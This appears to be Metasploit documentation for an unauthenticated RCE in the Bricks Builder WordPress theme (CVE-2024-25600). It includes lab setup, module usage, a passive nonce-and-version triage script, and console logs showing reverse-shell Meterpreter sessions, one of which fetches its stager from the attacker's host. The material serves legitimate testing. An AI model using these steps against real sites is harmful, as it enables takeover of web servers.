Vulnerable Application
This Metasploit module exploits an unauthenticated remote code execution vulnerability (CVE-2024-25600) in the Bricks Builder Theme for WordPress, affecting versions 1.9.6 and earlier (fixed in 1.9.6.1). The theme embeds a WordPress nonce in the front page for every visitor. That leaked nonce is enough to call the theme's `bricks/v1/render_element` REST endpoint without logging in, and the endpoint passes attacker-controlled element settings into an eval() call, so an unauthenticated attacker can execute arbitrary PHP as the web server user.
To replicate a vulnerable environment for testing:
- Install WordPress.
- Download and install the Bricks Builder Theme, making sure the version is 1.9.6 or earlier (the fix shipped in 1.9.6.1).
- Activate Bricks Builder.
- Create a page (or template) in the Bricks builder and add a few elements to it. The nonce is only embedded in the front page (index.php) when Bricks content is rendered there, and the module needs that nonce.
Verification Steps
- Set up a WordPress instance with the Bricks Builder Theme (version 1.9.6 or earlier) and at least one page built in Bricks, so the nonce is exposed.
- Launch `msfconsole`.
- Load the module: `use exploit/multi/http/wp_bricks_builder_rce`.
- Set `RHOSTS` to the IP address or hostname of the target.
- Adjust `TARGETURI`, `SSL` and `RPORT` as needed (the defaults are `/`, `true` and `443`).
- Run `exploit` (or `run`).
- If the target is vulnerable, the module retrieves the leaked nonce, confirms the target with its check, and executes the selected payload.
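Before pointing the module at a host it helps to know whether the front page actually leaks the nonce and which Bricks version is installed; the module's own check is the authority, but this triage is quick and leaves no exploit traffic. The script below is an added example, not part of the module's documentation or code. It pulls the nonce out of the `bricksData` object that Bricks writes into the page, reads the theme version from the `?ver=` query on theme asset URLs, and compares it with 1.9.6.1. The three sample pages are constructed for the example, and the `bricksData`/`?ver=` layout and the `fetch` helper are assumptions made here rather than anything the page states.

```python
import json
import re
import sys
import urllib.request

# Bricks 1.9.6.1 is the first release that closes this issue (CVE-2024-25600),
# so anything below it with the nonce exposed is a candidate.
FIXED_VERSION = (1, 9, 6, 1)

# Constructed sample pages (not captured from a real site). The layout of
# window.bricksData and the theme asset URL mirror what Bricks emits, but the
# host, nonce and version values are made up for this example.
VULNERABLE_HTML = r"""<!DOCTYPE html><html><head>
<link rel="stylesheet" href="https://wp.example/wp-content/themes/bricks/assets/css/frontend.min.css?ver=1.9.5">
<script id="bricks-scripts-js-extra">
var bricksData = {"ajaxUrl":"https:\/\/wp.example\/wp-admin\/admin-ajax.php","restApiUrl":"https:\/\/wp.example\/wp-json\/bricks\/v1\/","nonce":"deadbeef01","wpRestNonce":"0011223344"};
</script></head><body><section class="brxe-section"><h1 class="brxe-heading">Hello</h1></section></body></html>"""

# Same theme version, but a page with no Bricks elements: the script block that
# carries the nonce is not enqueued, so the module has nothing to work with.
EMPTY_PAGE_HTML = r"""<!DOCTYPE html><html><head>
<link rel="stylesheet" href="https://wp.example/wp-content/themes/bricks/assets/css/frontend.min.css?ver=1.9.5">
</head><body><p>Default page without Bricks content.</p></body></html>"""

# Patched install: the nonce is still embedded (the front end needs it), so its
# presence alone does not prove exploitability; the version decides.
PATCHED_HTML = VULNERABLE_HTML.replace("ver=1.9.5", "ver=1.9.6.1")


def extract_bricks_nonce(html):
    """Return the nonce leaked through window.bricksData, or None if absent."""
    # Non-greedy up to the first "};" that terminates the assignment. Values in
    # bricksData are strings or flat objects, so this does not cut the JSON short.
    m = re.search(r"var bricksData\s*=\s*(\{.*?\});", html, re.S)
    if not m:
        return None
    try:
        return json.loads(m.group(1)).get("nonce")
    except json.JSONDecodeError:
        return None


def theme_version(html):
    """Parse the Bricks version from the ?ver= of a theme asset URL, as a tuple.
    Assumption: the site has not stripped or overridden WordPress's ?ver= query."""
    m = re.search(r"/wp-content/themes/bricks/[^\s\"']*\?ver=([0-9]+(?:\.[0-9]+)*)", html)
    if not m:
        return None
    return tuple(int(part) for part in m.group(1).split("."))


def triage(html):
    """Summarise what the front page tells us about exploitability."""
    bricks = "/wp-content/themes/bricks/" in html
    nonce = extract_bricks_nonce(html)
    version = theme_version(html)
    # An unknown version is treated as possibly vulnerable; this only decides
    # whether running the module's check is worth it.
    old_enough = version is None or version < FIXED_VERSION
    return {
        "bricks_detected": bricks,
        "version": version,
        "nonce": nonce,
        "likely_vulnerable": bricks and nonce is not None and old_enough,
    }


def fetch(url):
    """Fetch a live front page (only used when a URL is given on the command line)."""
    req = urllib.request.Request(url, headers={"User-Agent": "bricks-nonce-check/1.0"})
    with urllib.request.urlopen(req, timeout=15) as resp:
        return resp.read().decode("utf-8", "replace")


if __name__ == "__main__":
    pages = {"constructed vulnerable": VULNERABLE_HTML,
             "constructed empty page": EMPTY_PAGE_HTML,
             "constructed patched": PATCHED_HTML}
    if len(sys.argv) > 1:
        pages = {sys.argv[1]: fetch(sys.argv[1])}
    for name, html in pages.items():
        print(name, triage(html))
```

Run it without arguments to exercise the three constructed pages, or pass the URL of a site you are authorised to test. The empty page on 1.9.5 comes back as not likely vulnerable only because the nonce is missing, which is the module precondition the Setup section addresses by adding elements; the site is still unpatched and should be updated regardless.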
Options
The module defines no options of its own. It uses only the standard HTTP client options (`RHOSTS`, `RPORT`, `SSL`, `TARGETURI`, `VHOST`, `Proxies`) plus the options of the selected payload.
Scenarios
Successful Exploitation Against Local WordPress with Bricks Builder Theme 1.8
Setup:
- Local WordPress instance with Bricks Builder Theme version 1.8.
- Metasploit Framework.
Steps:
- Start `msfconsole`.
- Load the module: `use exploit/multi/http/wp_bricks_builder_rce`
- Set `RHOSTS` to the local IP (e.g., 192.168.1.10).
- Configure other necessary options (`TARGETURI`, `SSL`, etc.).
- Launch the exploit: `exploit`
Expected Results:
- The module fetches the target's front page and extracts the leaked nonce; without it the module cannot proceed, which is why the Setup section says to add Bricks elements.
- It then delivers the payload through the vulnerable endpoint. With a `cmd/linux/http` fetch payload the target downloads the stager from the handler's HTTP server (`FETCH_SRVHOST`/`FETCH_SRVPORT`), so the target must be able to reach the attacking host; with a `php/meterpreter` payload the code runs directly inside the PHP worker.
- If successful, a session is opened on the target as the web server user; what it can do depends on the payload chosen.
Example:
With cmd/linux/http/x64/meterpreter/reverse_tcp:
msf6 > search bricks
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/wp_bricks_builder_rce 2024-02-19 excellent Yes Unauthenticated RCE in Bricks Builder Theme
Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/wp_bricks_builder_rce
msf6 > use 0
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_bricks_builder_rce) > options
Module options (exploit/multi/http/wp_bricks_builder_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The URI path to WordPress
VHOST no HTTP server virtual host
Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILENAME ilPaBylkCKr no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
FETCH_WRITABLE_DIR yes Remote writable dir to store payload; cannot contain spaces
LHOST 192.168.1.5 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/wp_bricks_builder_rce) > set ssl false
[!] Changing the SSL option's value may require changing RPORT!
ssl => false
msf6 exploit(multi/http/wp_bricks_builder_rce) > set rhosts localhost
rhosts => localhost
msf6 exploit(multi/http/wp_bricks_builder_rce) > set rport 8888
rport => 8888
msf6 exploit(multi/http/wp_bricks_builder_rce) > exploit
[*] Started reverse TCP handler on 192.168.1.5:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] Nonce retrieved: 953563d296
[*] Sending stage (3045380 bytes) to 172.20.0.2
[*] Meterpreter session 1 opened (192.168.1.5:4444 -> 172.20.0.2:39856) at 2024-02-26 21:51:11 +0100
meterpreter > sysinfo
Computer : 172.20.0.2
OS : Debian 11.8 (Linux 6.4.10-060410-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
With php/meterpreter/reverse_tcp:
msf6 exploit(multi/http/wp_bricks_builder_rce) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_bricks_builder_rce) > exploit
[*] Started reverse TCP handler on 192.168.1.5:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] Nonce retrieved: 953563d296
[*] Sending stage (39927 bytes) to 172.20.0.2
[*] Meterpreter session 2 opened (192.168.1.5:4444 -> 172.20.0.2:49678) at 2024-02-26 22:02:56 +0100
meterpreter > sysinfo
Computer : 65e1e703e433
OS : Linux 65e1e703e433 6.4.10-060410-generic #202308111154 SMP PREEMPT_DYNAMIC Fri Aug 11 12:00:45 UTC 2023 x86_64
Meterpreter : php/linux
meterpreter >